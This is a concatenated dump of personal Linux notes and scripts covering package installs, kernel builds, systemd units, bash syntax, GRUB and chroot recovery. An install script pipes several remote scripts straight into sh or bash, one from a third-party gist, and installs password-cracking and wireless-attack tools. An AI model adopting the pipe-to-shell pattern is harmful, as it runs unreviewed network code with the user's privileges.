16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Linux/Debian/apps-install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # A simple script to easily install some of my go-to apps in a debian based system 4 | 5 | sudo apt update -y 6 | 7 | sudo apt install -y \ 8 | git vim nemo samba pdfarranger \ 9 | meld evince xournal gscan2pdf \ 10 | texlive texlive-full \ 11 | vlc filezilla speedtest-cli \ 12 | kdeconnect indicator-multiload \ 13 | wireshark aircrack-ng nmap zenmap \ 14 | john macchanger steghide cmatrix \ 15 | traceroute whois xbindkeys xautomation \ 16 | solaar network-manager \ 17 | btop htop gparted gdu fzf \ 18 | software-properties-common dconf-editor expect hardinfo openvpn caffeine psensor gnome-system-monitor gnome-tweaks clamav clamtk tmux tree figlet ranger ncdu calcurse xclip neofetch iperf3 bmon iftop nload ptunnel tcpdump chromium-browser 19 | 20 | 21 | # Communication 22 | sudo snap install skype 23 | sudo snap install telegram-desktop 24 | sudo snap install caprine # Facebook messenger 25 | # Slack 26 | 27 | #ZSH fonts 28 | git clone https://github.com/powerline/fonts.git --depth=1 29 | cd fonts 30 | ./install.sh 31 | 32 | # Ollama 33 | curl -fsSL https://ollama.com/install.sh | sh 34 | 35 | # Rust 36 | curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh 37 | 38 | # Docker 39 | bash <(curl -sL https://gist.githubusercontent.com/CSpyridakis/0dd4e045dcddc68496c8403c098e0c19/raw/0fda1a194f559b05d6e26311c54090abe0cba4ca/install-docker.sh) 40 | 41 | # Lazygit 42 | LAZYGIT_VERSION=$(curl -s "https://api.github.com/repos/jesseduffield/lazygit/releases/latest" | \grep -Po '"tag_name": *"v\K[^"]*') 43 | curl -Lo lazygit.tar.gz "https://github.com/jesseduffield/lazygit/releases/download/v${LAZYGIT_VERSION}/lazygit_${LAZYGIT_VERSION}_Linux_x86_64.tar.gz" 44 | tar xf lazygit.tar.gz lazygit 45 | sudo install lazygit -D -t /usr/local/bin/ 46 | 47 | # Lazydocker 48 | curl https://raw.githubusercontent.com/jesseduffield/lazydocker/master/scripts/install_update_linux.sh | bash 49 | -------------------------------------------------------------------------------- /Linux/Kernel/README.md: -------------------------------------------------------------------------------- 1 | # Kernel 2 | 3 | The Linux kernel is the core component of a Linux OS. 4 | 5 | It manages hardware resources, processes, memory, device drivers, file systems, and networking. 6 | 7 | --- 8 | 9 | ## Types of Kernels 10 | 11 | **Monolithic**: Linux is monolithic, i.e. everything (drivers, filesystem, networking) runs in kernel space. 12 | 13 | **Modular**: Linux supports loadable kernel modules (LKMs) that can be inserted/removed at runtime (e.g. modprobe, insmod). 14 | 15 | --- 16 | 17 | ## Kernel Versioning 18 | 19 | Format: `major`**.**`minor`**.**`patch` (e.g., 6.1.15) 20 | - Even minor numbers used to mean "stable"; this is no longer the case. 21 | 22 | LTS (Long Term Support) kernels are maintained for years (e.g., 5.10, 6.1). 23 | 24 | Get version: `uname -r` 25 | 26 | --- 27 | 28 | ## Modules 29 | List kernel modules 30 | ``` 31 | sudo lsmod 32 | ``` 33 | 34 | ```mermaid 35 | graph BT 36 | 37 | 38 | HARDWARE <--> hmanage 39 | 40 | subgraph KERNEL["Kernel space"] 41 | direction BT 42 | hmanage["Hardware management"] <--> syscalls["System calls"] 43 | end 44 | 45 | syscalls <--> libs 46 | subgraph USER["User space"] 47 | direction BT 48 | libs["Standard Libraries"] <--> applications["Etc.. (Applications)"] 49 | end 50 | ``` 51 | 52 | --- 53 | ## Important Directories & Files 54 | 55 | | **Path** | **Purpose** | 56 | |----------------------------------|--------------------------------------------| 57 | | `/proc` | Virtual filesystem for kernel info | 58 | | `/sys` | Kernel exposes hardware & device info | 59 | | `/boot` | Stores kernel images and initramfs | 60 | | `/lib/modules/$(uname -r)` | Kernel modules for the current kernel | 61 | 62 | --- 63 | 64 | ## Common Commands 65 | | **Task** | **Command** | 66 | |------------------------------|----------------------------------------------| 67 | | View kernel version | `uname -r` | 68 | | List loaded modules | `lsmod` | 69 | | Load a module | `modprobe ` | 70 | | Unload a module | `modprobe -r ` or `rmmod ` | 71 | | Show kernel log (ring buffer)| `dmesg` | 72 | -------------------------------------------------------------------------------- /Linux/RPM/CentOS/README.md: -------------------------------------------------------------------------------- 1 | # CentOS 2 | 3 | Initial configuration 4 | ``` 5 | sudo dnf install epel-release 6 | ``` 7 | 8 | The epel-release package on CentOS enables the Extra Packages for Enterprise Linux (EPEL) -------------------------------------------------------------------------------- /Linux/RPM/httpd/demo-http-server-simple.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Update system 4 | yum update -y 5 | 6 | # Install HTTP server 7 | yum install -y httpd 8 | systemctl enable httpd 9 | systemctl start httpd 10 | 11 | # Add a dummy page 12 | echo "

If you are here, then Congrats! There is a working http server on your machine.

" \ 13 | > /var/www/html/index.html 14 | 15 | 16 | -------------------------------------------------------------------------------- /Linux/Systemd/examples/ddns-update/INSTALL: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | set -e 4 | 5 | # Paths 6 | SCRIPT_SRC_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" 7 | SCRIPT_DST="/usr/local/bin/update_ddns.sh" 8 | SERVICE_DST="/etc/systemd/system/update_ddns.service" 9 | TIMER_DST="/etc/systemd/system/update_ddns.timer" 10 | 11 | echo "Installing update_ddns.sh..." 12 | sudo install -m 755 "$SCRIPT_SRC_DIR/update_ddns.sh" "$SCRIPT_DST" 13 | 14 | echo "Installing systemd service and timer..." 15 | sudo install -m 644 "$SCRIPT_SRC_DIR/update_ddns.service" "$SERVICE_DST" 16 | sudo install -m 644 "$SCRIPT_SRC_DIR/update_ddns.timer" "$TIMER_DST" 17 | 18 | echo "Reloading systemd..." 19 | sudo systemctl daemon-reload 20 | 21 | echo "Enabling and starting the timer..." 22 | sudo systemctl enable --now update_ddns.timer 23 | 24 | echo "Installation complete!" -------------------------------------------------------------------------------- /Linux/Systemd/examples/ddns-update/update_ddns.service: -------------------------------------------------------------------------------- 1 | # /etc/systemd/system/update_ip.service 2 | [Unit] 3 | Description=Update DDNS and log IP 4 | 5 | [Service] 6 | Type=oneshot 7 | ExecStart=/usr/local/bin/update_ddns.sh 8 | -------------------------------------------------------------------------------- /Linux/Systemd/examples/ddns-update/update_ddns.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # ---------------------------------------------- 4 | # Log IP 5 | # ---------------------------------------------- 6 | 7 | # Define log file 8 | LOG_DIR="/log" 9 | LOG_FILE="$LOG_DIR/ip_logs.txt" 10 | 11 | # Create log directory if it doesn't exist 12 | mkdir -p "$LOG_DIR" 13 | 14 | # Get public IP 15 | PUBLIC_IP=$(curl -s https://api.ipify.org) 16 | 17 | # Get current timestamp 18 | TIMESTAMP=$(date "+%Y-%m-%d %H:%M:%S") 19 | 20 | # Log the timestamp and IP 21 | echo "$TIMESTAMP - $PUBLIC_IP" >> "$LOG_FILE" 22 | 23 | # ---------------------------------------------- 24 | # Update DDNS 25 | # ---------------------------------------------- 26 | # FIXME: This is specific to each DDNS used -------------------------------------------------------------------------------- /Linux/Systemd/examples/ddns-update/update_ddns.timer: -------------------------------------------------------------------------------- 1 | # /etc/systemd/system/update_ip.timer 2 | [Unit] 3 | Description=Run update_ddns.service every hour 4 | 5 | [Timer] 6 | OnCalendar=hourly 7 | Persistent=true 8 | 9 | [Install] 10 | WantedBy=timers.target 11 | -------------------------------------------------------------------------------- /Linux/Systemd/my-dummy-service.service: -------------------------------------------------------------------------------- 1 | [Unit] 2 | Description=My Dummy Service 3 | 4 | [Service] 5 | Type=oneshot 6 | 7 | # Set environment variables 8 | Environment="MY_DUMMY_SERVICE=dummy-service-env-var" 9 | 10 | ExecStart=date +"%%d-%%m-%%Y %%T" 11 | ExecStart=echo "My dummy service ENV VAR: ${MY_DUMMY_SERVICE}" 12 | 13 | PrivateTmp=true 14 | 15 | Restart=no 16 | 17 | StandardError=journal 18 | StandardOutput=journal 19 | # Or 20 | # StandardOutput=append:/tmp/my-dummy-service.log 21 | 22 | [Install] 23 | WantedBy=multi-user.target -------------------------------------------------------------------------------- /Linux/Systemd/service.md: -------------------------------------------------------------------------------- 1 | # Systemd Service 2 | 3 | A **service** in systemd is a type of unit file that tells the system how to **start**, **stop**, **reload**, and manage a background **service** or **process**, e.g. a web server, database, or custom script. 4 | 5 | --- 6 | 7 | ## Service file 8 | Service file example. An enhanced [.service](./service-template.service) example is located here. 9 | ``` 10 | [Unit] 11 | # Contains a more general configuration for the unit 12 | 13 | Description=Some description 14 | Documentation=Link or man page 15 | 16 | 17 | [Service] 18 | # Defines how the service should behave, like start/stop/reload commands executed 19 | 20 | Type=simple 21 | ExecStart= 22 | 23 | [Install] 24 | # Install ~= enable/disable 25 | # In which target we will enable the service if the service is enabled 26 | WantedBy=.target 27 | ``` 28 | 29 | -------------------------------------------------------------------------------- /Linux/Systemd/target.md: -------------------------------------------------------------------------------- 1 | # Systemd targets 2 | 3 | In systemd, a target is a special kind of unit that groups other units together to manage the system's state, like booting into graphical mode, multi-user mode, rescue mode, etc. 4 | 5 | --- 6 | 7 | ## Common targets: 8 | 9 | | Target | Description | 10 | | ----- | ------------- | 11 | | `graphical.target` | Multi-user system with GUI 12 | | `multi-user.target` | Multi-user system without GUI 13 | | `rescue.target` | Minimal system for maintenance (single-user mode) 14 | | `emergency.target` | Bare minimum system with no services except systemd and a shell 15 | | `default.target` | The default target used at boot (symlink to one of the above) 16 | 17 | --- 18 | 19 | ## Common commands: 20 | 21 | - Check your current target: `sudo systemctl get-default` 22 | - List available targets: `sudo systemctl list-units --type target --all` 23 | - Switch current target: `sudo systemctl isolate .target` 24 | - Change default target: `sudo systemctl set-default .target` 25 | - See which services are tied to a target: `sudo systemctl list-dependencies .target` 26 | 27 | --- 28 | 29 | ## How it works 30 | Assume the following `.service` file 31 | ``` 32 | ... 33 | [Install] 34 | WantedBy=.target 35 | ``` 36 | 37 | The idea is that at the point we execute: `sudo systemctl enable ` 38 | 39 | A **symlink** will be created in `/etc/systemd/system/.target.wants/.service`. 40 | 41 | Hence, all services need to be started at a given target will be located in the same place. -------------------------------------------------------------------------------- /Linux/Ubuntu/workspaces.md: -------------------------------------------------------------------------------- 1 | 2 | ## Workspace Grid 3 | 4 | ### Set Workspace grid 5 | ``` 6 | # Install dconf 7 | sudo apt install dconf-editor 8 | 9 | # Set the grid size 10 | WNUM="3 11 | 12 | # Number of vertical workspaces 13 | dconf write /org/compiz/profiles/unity-lowgfx/plugins/core/vsize ${WNUM} 14 | 15 | # Number of horizontal workspaces 16 | dconf write /org/compiz/profiles/unity-lowgfx/plugins/core/hsize ${WNUM} 17 | ``` 18 | 19 | ### Verify 20 | ``` 21 | dconf read /org/compiz/profiles/unity-lowgfx/plugins/core/vsize 22 | dconf read /org/compiz/profiles/unity-lowgfx/plugins/core/hsize 23 | ``` -------------------------------------------------------------------------------- /Linux/awesome-cli-tools.md: -------------------------------------------------------------------------------- 1 | # Awesome tools 2 | 3 | | Tool | Description | 4 | | --------- | ------------- | 5 | | `links` | CLI 'browser' | -------------------------------------------------------------------------------- /Linux/bash/brackets.md: -------------------------------------------------------------------------------- 1 | # Brackets 2 | 3 | For more details regarding conditions read [this](./conditions.md). 4 | 5 | | **Construct** | **Description** | **When to Use** | 6 | |---------------|----------------------------------------------|-----------------------------------------------------------------------------| 7 | | `( )` | Subshell: commands run in a separate process | When you want to isolate temporary changes, like directory changes or variables, without affecting the parent shell. | 8 | | `{ }` | Grouping in the current shell | When you need to group multiple commands that share variables or environment changes in the current shell. | 9 | | `[]` | Basic test | For simple conditional checks (POSIX-compliant), such as file existence or string/numeric comparisons. | 10 | | `[[ ]]` | Advanced test | For more complex Bash-specific conditions, including logical operators (`&&`, `\|\|`) or regex matching. | 11 | | `(( ))` | Arithmetic evaluation | When performing numeric operations or comparisons directly within a script. | 12 | -------------------------------------------------------------------------------- /Linux/bash/conditions.md: -------------------------------------------------------------------------------- 1 | # Conditions 2 | 3 | ## "No brackets" 4 | Relying on Command Exit Codes 5 | 6 | E.g. 7 | ``` bash 8 | if grep -q "pattern" file.txt; then 9 | echo "Pattern found" 10 | fi 11 | ``` 12 | 13 | Avoid "no brackets" approaches unless your use case is simple or implicit logic suffices. 14 | 15 | ## Single Brackets [] 16 | Used for simple conditional checks, such as string comparisons, file checks, or numeric comparisons. 17 | 18 | **Caution:** 19 | Requires spaces between the brackets and the expression. 20 | 21 | E.g. 22 | ``` bash 23 | # String comparison 24 | if [ "$var" = "value" ]; then 25 | echo "Match" 26 | fi 27 | 28 | # File existence 29 | if [ -f "file.txt" ]; then 30 | echo "File exists" 31 | fi 32 | 33 | # Numeric comparison 34 | if [ "$num" -eq 10 ]; then 35 | echo "Number is 10" 36 | fi 37 | ``` 38 | 39 | Limitations: 40 | 41 | * Cannot handle complex logical expressions (e.g., && or ||) without combining multiple conditions. 42 | 43 | * Doesn't support regex matching. 44 | 45 | --- 46 | 47 | ## Double Brackets [[]] 48 | Enhanced test command with more features and improved syntax. 49 | 50 | **Caution:** 51 | Specific to Bash (not POSIX-compliant). Supports additional operators like &&, ||, and regex matching. Quoting variables is less strict (no errors for empty variables). 52 | 53 | E.g. 54 | ``` bash 55 | # Logical operators 56 | if [[ "$var" = "value" && "$num" -gt 5 ]]; then 57 | echo "Conditions met" 58 | fi 59 | 60 | # Regex matching 61 | if [[ "$var" =~ ^[A-Za-z]+$ ]]; then 62 | echo "Variable contains only letters" 63 | fi 64 | ``` 65 | 66 | Advantages: 67 | 68 | * Easier syntax for logical operators and regex. 69 | 70 | * Safer and more readable compared to [ ]. 71 | 72 | 73 | ## Double Parentheses (( )) 74 | Used for arithmetic evaluation. 75 | 76 | **Caution:** 77 | Supports C-like arithmetic operations (+, -, *, /, ++, --). 78 | Return status indicates whether the result is non-zero (useful in conditions). 79 | 80 | E.g. 81 | ``` bash 82 | # Arithmetic comparison 83 | if (( num > 10 )); then 84 | echo "Number is greater than 10" 85 | fi 86 | 87 | # Arithmetic operations 88 | (( count++ )) 89 | (( sum = num1 + num2 )) 90 | 91 | ``` 92 | 93 | Advantages: 94 | 95 | * Cleaner syntax for arithmetic operations and comparisons. 96 | 97 | * No need to use -eq, -gt, etc., for numeric comparisons. 98 | -------------------------------------------------------------------------------- /Linux/bash/program-variables.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | echo "Start:" 4 | sleep 2 5 | 6 | echo "> CMD: [\$0] - Name of the script - Output: [$0]" 7 | echo "> CMD: [\$1-\$9] - Bash script input arguments - Output: ['$1', '$2', ...]" 8 | echo "> CMD: [\$#] - Number of arguments - Output: [$#]" 9 | echo "> CMD: [\$@] - Input arguments - Output: [$@]" 10 | echo "> CMD: [\$?] - Exit status of previous command - Output: [$?]" 11 | echo "> CMD: [\$$] - The script process ID - Output: [$$]" 12 | echo "> CMD: [\$USER] - User executing script - Output: [$USER]" 13 | echo "> CMD: [\$HOSTNAME] - Machine hostname - Output: [$HOSTNAME]" 14 | echo "> CMD: [\$SECONDS] - Seconds passed since stript started - Output: [$SECONDS]" 15 | echo "> CMD: [\$RANDOM] - A random number - Output: [$RANDOM]" 16 | echo "> CMD: [\$LINENO] - Current line number - Output: [$LINENO]" 17 | 18 | -------------------------------------------------------------------------------- /Linux/bash/uuid.md: -------------------------------------------------------------------------------- 1 | # Universally Unique Identifier (UUID) 2 | A 128-bit or 32 hexadecimal digits 3232323number used to uniquely identify objects or entities in computer systems. 3 | 4 | * Standard Format: 5 | `xxxxxxxx-xxxx-Mxxx-Nxxx-xxxxxxxxxxxx` 6 | 7 | M: The version of the UUID (e.g., version 1, 4). 8 | N: Indicates variant and type (e.g., standard or reserved). 9 | 10 | | **Version** | **Name** | **Generation Mechanism** | **Use Case** | 11 | |-------------|-------------------|------------------------------------------------------------|------------------------------------------------------| 12 | | 1 | Timestamp-based | Combines current timestamp with the MAC address of the machine. | Useful when time-ordering is required. | 13 | | 2 | DCE Security | Similar to version 1 but includes POSIX UIDs (User IDs) and other fields. | Less commonly used, mainly for legacy systems. | 14 | | 3 | Name-based (MD5) | Uses an MD5 hash of a namespace and a name. Deterministic. | Useful for generating consistent IDs from inputs. | 15 | | 4 | Random | Generated entirely randomly. | Most common version due to simplicity and randomness.| 16 | | 5 | Name-based (SHA-1)| Uses a SHA-1 hash of a namespace and a name. Deterministic. | Similar to version 3 but more secure. | 17 | 18 | 19 | * Generate in Linux: 20 | Random-Based UUIDs : `uuidgen -r` 21 | Time-Based UUIDs: `uuidgen -t` 22 | Hash-Based UUIDs (MD5): `uuidgen -m -N -n @url` 23 | Hash-Based UUIDs (SHA1): `uuidgen -s -N -n @url` 24 | Using kernel: `cat /proc/sys/kernel/random/uuid` -------------------------------------------------------------------------------- /Linux/bash/variables.md: -------------------------------------------------------------------------------- 1 | # Bash Variables and Their Outputs 2 | 3 | | **Variable** | **Description** | **Output Example** | 4 | |-----------------|----------------------------------------------------|-------------------------------------| 5 | | `$0` | Name of the script | `script.sh` | 6 | | `$1, $2, ...` | Positional parameters (arguments to the script) | `arg1`, `arg2`, etc. | 7 | | `$#` | Number of arguments passed to the script | `2` (if two arguments are passed) | 8 | | `$@` | All arguments passed to the script | `arg1 arg2` | 9 | | `$?` | Exit status of the last executed command | `0` (success) or `non-zero` (failure) | 10 | | `$$` | Process ID (PID) of the script | `12345` | 11 | | `$USER` | Username of the user executing the script | `john` | 12 | | `$HOSTNAME` | Hostname of the machine | `my-computer` | 13 | | `$SECONDS` | Number of seconds since the script started | `45` | 14 | | `$RANDOM` | A random number | `28657` | 15 | | `$LINENO` | Current line number in the script | `15` | 16 | 17 | Example: 18 | ``` 19 | echo "> CMD: [\$0] - Name of the script - Output: [$0]" 20 | echo "> CMD: [\$1-\$9] - Bash script input arguments - Output: ['$1', '$2', ...]" 21 | echo "> CMD: [\$#] - Number of arguments - Output: [$#]" 22 | echo "> CMD: [\$@] - Input arguments - Output: [$@]" 23 | echo "> CMD: [\$?] - Exit status of previous command - Output: [$?]" 24 | echo "> CMD: [\$$] - The script process ID - Output: [$$]" 25 | echo "> CMD: [\$USER] - User executing script - Output: [$USER]" 26 | echo "> CMD: [\$HOSTNAME] - Machine hostname - Output: [$HOSTNAME]" 27 | echo "> CMD: [\$SECONDS] - Seconds passed since stript started - Output: [$SECONDS]" 28 | echo "> CMD: [\$RANDOM] - A random number - Output: [$RANDOM]" 29 | echo "> CMD: [\$LINENO] - Current line number - Output: [$LINENO]" 30 | ``` -------------------------------------------------------------------------------- /Linux/bootloader.md: -------------------------------------------------------------------------------- 1 | # Bootloader 2 | 3 | Bootloader's goal is to load into memory the kernel and then pass the control to the OS. 4 | 5 | **GRUB2** is one of the well known bootloaders. 6 | 7 | ```mermaid 8 | flowchart LR 9 | 10 | bios["BIOS/UEFI"] --> grub["Bootloader"] --> kernel["Kernel"] 11 | ``` 12 | 13 | GRUB2 configuration location: `/etc/default/grub` 14 | 15 | Update configuration 16 | 17 | Debian based: 18 | ```bash 19 | sudo update-grub 20 | ``` 21 | 22 | Red Hat based 23 | ```bash 24 | sudo grub2-mkconfig -o /boot/grub2/grub.cfg 25 | ``` 26 | 27 | Both will update `/boot/grub/grub.cfg` 28 | 29 | > [!IMPORTANT] 30 | > **NEVER** update manually the `/boot/grub/grub.cfg` -------------------------------------------------------------------------------- /Linux/bu/snapshots.md: -------------------------------------------------------------------------------- 1 | # Snapshots 2 | 3 | ## Timeshift 4 | 5 | **Common Commands** 6 | ```bash 7 | # Show Available Snapshots 8 | sudo timeshift --list 9 | 10 | # Check available devices 11 | sudo timeshift --list-devices 12 | 13 | # Create a New Snapshot 14 | # --tags D: Tags the snapshot as a Demand, Weekly, Monthly, Boot 15 | sudo timeshift --create --comments "Manual backup" --tags D 16 | 17 | # Restore a Snapshot 18 | sudo timeshift --restore 19 | 20 | # Delete a Snapshot 21 | sudo timeshift --delete --snapshot '' 22 | ``` -------------------------------------------------------------------------------- /Linux/build-and-install-kernel.md: -------------------------------------------------------------------------------- 1 | # Build and install a different linux kernel 2 | 3 | Instructions based on this [guide](https://phoenixnap.com/kb/build-linux-kernel) 4 | 5 | ## 1. Download Linux kernel source code (kernel.org) 6 | ``` 7 | LINUX_KERNEL_INST_VERSION="6.10.9" 8 | wget https://cdn.kernel.org/pub/linux/kernel/v6.x/linux-${LINUX_KERNEL_INST_VERSION}.tar.xz 9 | ``` 10 | 11 | ## 2. Extract the source code 12 | ``` 13 | tar xvf linux-${LINUX_KERNEL_INST_VERSION}.tar.xz 14 | ``` 15 | 16 | ## 3. Install additional packages 17 | ``` 18 | sudo apt-get install git fakeroot build-essential ncurses-dev xz-utils libssl-dev bc flex libelf-dev bison 19 | ``` 20 | 21 | ## 4. Configure Kernel 22 | ``` 23 | cd linux-${LINUX_KERNEL_INST_VERSION} 24 | cp /boot/config-$(uname -r) .config 25 | make menuconfig 26 | # Make any needed changes regarding modules 27 | ``` 28 | 29 | ## 5. Disable on Ubuntu conflicting security certificates 30 | ``` 31 | scripts/config --disable SYSTEM_TRUSTED_KEYS 32 | scripts/config --disable SYSTEM_REVOCATION_KEYS 33 | ``` 34 | 35 | ## 6. Build the kernel (This will take some time) 36 | ``` 37 | make -j $(nproc) 38 | ``` 39 | 40 | ## 7. Install the required modules 41 | ``` 42 | sudo make modules_install 43 | ``` 44 | 45 | ## 8. Install the kernel 46 | ``` 47 | sudo make install 48 | ``` 49 | 50 | ## 9. (OPTIONAL) Update bootloader 51 | ``` 52 | # `make install` command performs this process automatically, but you can also do it manually 53 | sudo update-initramfs -c -k ${LINUX_KERNEL_INST_VERSION} 54 | sudo update-grub 55 | ``` 56 | 57 | ## 10. Reboot 58 | ## 11 If kernel does not change then ([reference](https://askubuntu.com/questions/82140/how-can-i-boot-with-an-older-kernel-version)) 59 | ``` 60 | # 1. Find kernel number 61 | sudo grub-mkconfig | grep -iE "menuentry 'Ubuntu, with Linux" | awk '{print i++ " : "$1, $2, $3, $4, $5, $6, $7}' 62 | 63 | # 2. Change GRUB_DEFAULT="1>N" where N required kernel 64 | sudo nano /etc/default/grub 65 | 66 | # 3. Update 67 | sudo update-grub 68 | ``` 69 | -------------------------------------------------------------------------------- /Linux/cgroup/README.md: -------------------------------------------------------------------------------- 1 | # CGroup 2 | 3 | A **cgroup** (short for control group) in Linux, is a kernel feature that organizes and limits system resources (CPU, memory, disk I/O, etc) for a group of processes. 4 | 5 | **Containers**, **systemd**, and other technologies utilize this feature in order to work. 6 | 7 | View cgroups: `systemctl status` 8 | Inspect cgroups: `systemd-cgtop` 9 | 10 | \*By default only 3 levels are displayed (to increase this value: `--depth=`) 11 | 12 | You can usually find cgroups mounted in: `/sys/fs/cgroup` 13 | 14 | Slice file 15 | ``` 16 | [Slice] 17 | MemoryHigh=500M 18 | ``` 19 | 20 | `systemd-rum --user --slice=.slice ` -------------------------------------------------------------------------------- /Linux/chroot-liveusb.md: -------------------------------------------------------------------------------- 1 | # Live USB chroot 2 | There are occasions in which we need to login to a system that cannot boot properly. Maybe because it is corrupted, there is a wrong configuration, etc. 3 | 4 | This contains the instructions to boot from a live USB to a distribution, in order to fix the problem. To achieve this we will leverage `chroot`. Before continue, create a bootable USB, boot using it and open a terminal. Then follow, these steps: 5 | 6 | ## 0. Find disk 7 | Use `lsblk` or `df -h` 8 | 9 | 10 | ## 1. Mount the root partition 11 | ``` 12 | sudo mount /dev/sdaX /mnt 13 | ``` 14 | 15 | ## 2. If have, mount separate boot partition 16 | ``` 17 | sudo mount /dev/sdaY /mnt/boot 18 | ``` 19 | 20 | ## Binding system directories. 21 | ``` 22 | sudo mount -t proc /proc /mnt/proc 23 | sudo mount -o bind /dev /mnt/dev 24 | sudo mount -t sysfs /sys /mnt/sys 25 | sudo mount -o bind /run /mnt/run 26 | sudo mount -t devpts /pts /mnt/dev/pts 27 | ``` 28 | 29 | ## Chroot 30 | ``` 31 | sudo chroot /mnt /bin/bash 32 | ``` 33 | 34 | --- 35 | 36 | ## DO ANYTHING you want! 37 | Maybe install packages, remove files,etc... 38 | 39 | --- 40 | 41 | ## At the end 42 | ``` 43 | exit 44 | sudo umount /mnt/dev/pts /mnt/run /mnt/sys mnt/dev /mnt/proc /mnt/boot /mnt 45 | sudo reboot 46 | ``` -------------------------------------------------------------------------------- /Linux/dnf/README.md: -------------------------------------------------------------------------------- 1 | # DNF package manager 2 | 3 | `dnf` (Dandified YUM) is a package manager for RPM-based Linux distributions like: 4 | - Fedora 5 | - RHEL (Red Hat Enterprise Linux) 6 | - CentOS 7 | - Rocky Linux, AlmaLinux, etc. 8 | 9 | What it does: 10 | - Installs, removes, updates, and manages software packages. 11 | - Resolves dependencies automatically. 12 | - Works with **.rpm** packages (Red Hat Package Manager format). 13 | - Replaces the older yum tool. 14 | 15 | Backend tool: **rpm**. 16 | 17 | --- 18 | 19 | ## Common Commands 20 | | Command | Description | 21 | |----------------------------------------------|-------------------------------------------------------------------------------------------------------| 22 | | `sudo dnf versionlock ` | Do not update/upgrade a package (lock its version). Requires `sudo dnf install 'dnf-command(versionlock)'`. Useful for locking a specific kernel version. | 23 | | `dnf search ` | Search for a package | 24 | | `dnf info ` | Get detailed info about a package | 25 | | `sudo dnf install ` | Install a package | 26 | | `sudo dnf remove ` | Remove a package | 27 | | `sudo dnf update` | Update all packages | 28 | | `sudo dnf update ` | Update a specific package | 29 | | `dnf list installed` | List all installed packages | 30 | | `dnf list available` | List available packages | 31 | | `sudo dnf clean all` | Clean cache and metadata | 32 | 33 | -------------------------------------------------------------------------------- /Linux/load-average.md: -------------------------------------------------------------------------------- 1 | # Load average 2 | 3 | How busy is the system. 4 | 5 | > [!TIP] 6 | > **Rule of thumb**: Load average should be ≤ number of CPU cores. 7 | 8 | ## Useful Commands 9 | | Command | Description | 10 | |-----------------------|-----------------------------------------------------------------------------| 11 | | `uptime` | Shows how long the system has been running, number of users, and load average. | 12 | | `cat /proc/loadavg` | Displays the same load averages as `uptime`, running / total processes and last PID. | 13 | | `top` | Interactive process viewer that also shows load averages and CPU usage. | 14 | | `nproc` | Displays the number of processing units (cores) available. | 15 | 16 | 17 | ## Output 18 | ```bash 19 | load average: 0.02, 0.20, 0.02 20 | # Load average is shown for 1, 5, and 15 minutes. 21 | ``` 22 | 23 | Normalized to the number of CPUs, load 1 per Core. 24 | 25 | **How to interpret:** 26 | | Load Avg | Cores (nproc) | Interpretation 27 | | ---------| ------------- | -------------- 28 | | 1.0 | 1 | Full CPU usage 29 | | 2.0 | 1 | Overloaded 30 | | 0.5 | 1 | Underloaded (50% utilization) 31 | | 4.0 | 4 | Fully utilized (ideal scenario) 32 | | 6.0 | 4 | Overloaded (may experience latency/slowness) -------------------------------------------------------------------------------- /Linux/logs/README.md: -------------------------------------------------------------------------------- 1 | # Logs 2 | 3 | Most of the logs exist under `/var/log/` dir. 4 | 5 | 6 | **Binary log files:** 7 | | Binary file | Command to read log | Distro | Description | 8 | | ----------- | ------------------- | ------ | ----------- | 9 | | **/var/log/wtmp** | `last ` | RH/Debian | Shows the login history of users | 10 | | **/var/log/lastlog** | `lastlog` | RH/Debian | Displays the most recent login of all users | 11 | | **/var/log/btmp** | `lastb -adF` | RH/Debian | Bad login attempts (Check malicious activity) | 12 | 13 | 14 | **Text log files:** 15 | | Text file | Distro | Description | Tricks/Extra info | 16 | | --------- | ------ | ----------- | ------ | 17 | | **/var/log/auth.log** | Debian | Authorization attempts | Can be used to trubleshoot SSH login attempts that fail | 18 | | **/var/log/secure** | RH | Authorization attempts | * Not enabled by default in some distros, need to use journalctl 19 | | **/var/log/syslog** | Debian | System messages and logs | 20 | | **/var/log/messages** | RH | System messages and logs | -------------------------------------------------------------------------------- /Linux/misc/README.md: -------------------------------------------------------------------------------- 1 | # General misc notes 2 | 3 | ## > Default CLI editor 4 | To set the default editor set this ENV var 5 | ```bash 6 | export EDITOR=vim 7 | ``` 8 | 9 | or 10 | ```bash 11 | echo "export EDITOR=vim" >> ~/.bashrc && source ~/.bashrc 12 | ``` 13 | 14 | ## `sudoedit` vs `sudo vim` 15 | 16 | 17 | ## > Laptop LID 18 | 19 | [Source](https://askubuntu.com/questions/15520/how-can-i-tell-ubuntu-to-do-nothing-when-i-close-my-laptop-lid) 20 | 21 | Action to do when closing the Laptop lid (Do nothing): 22 | 1. Edit: `sudoedit /etc/systemd/logind.conf` 23 | 2. Then make sure that this configuration is available: `HandleLidSwitch=ignore` 24 | 3. Restart daemon `sudo systemctl restart systemd-logind` 25 | 26 | ## > `sudoedit` vs `sudo -e` vs `sudo vim` 27 | 28 | | Command | Editor runs as | Safe? | Uses `$EDITOR` | Temporary copy? | Recommended | 29 | |---------------|----------------|--------|----------------|------------------|-------------| 30 | | `sudoedit` | User | Yes | Yes | Yes | Yes | 31 | | `sudo -e` | User | Yes | Yes | Yes | Yes | 32 | | `sudo vim` | Root | No | No | No | No | 33 | 34 | > [!CAUTION] 35 | > Always use `sudoedit` or `sudo -e` for editing system files. 36 | 37 | > [!NOTE] 38 | > `sudo -e` is just a different syntax/alias provided by `sudoedit` -------------------------------------------------------------------------------- /Linux/storage/disks-manipulation.md: -------------------------------------------------------------------------------- 1 | # 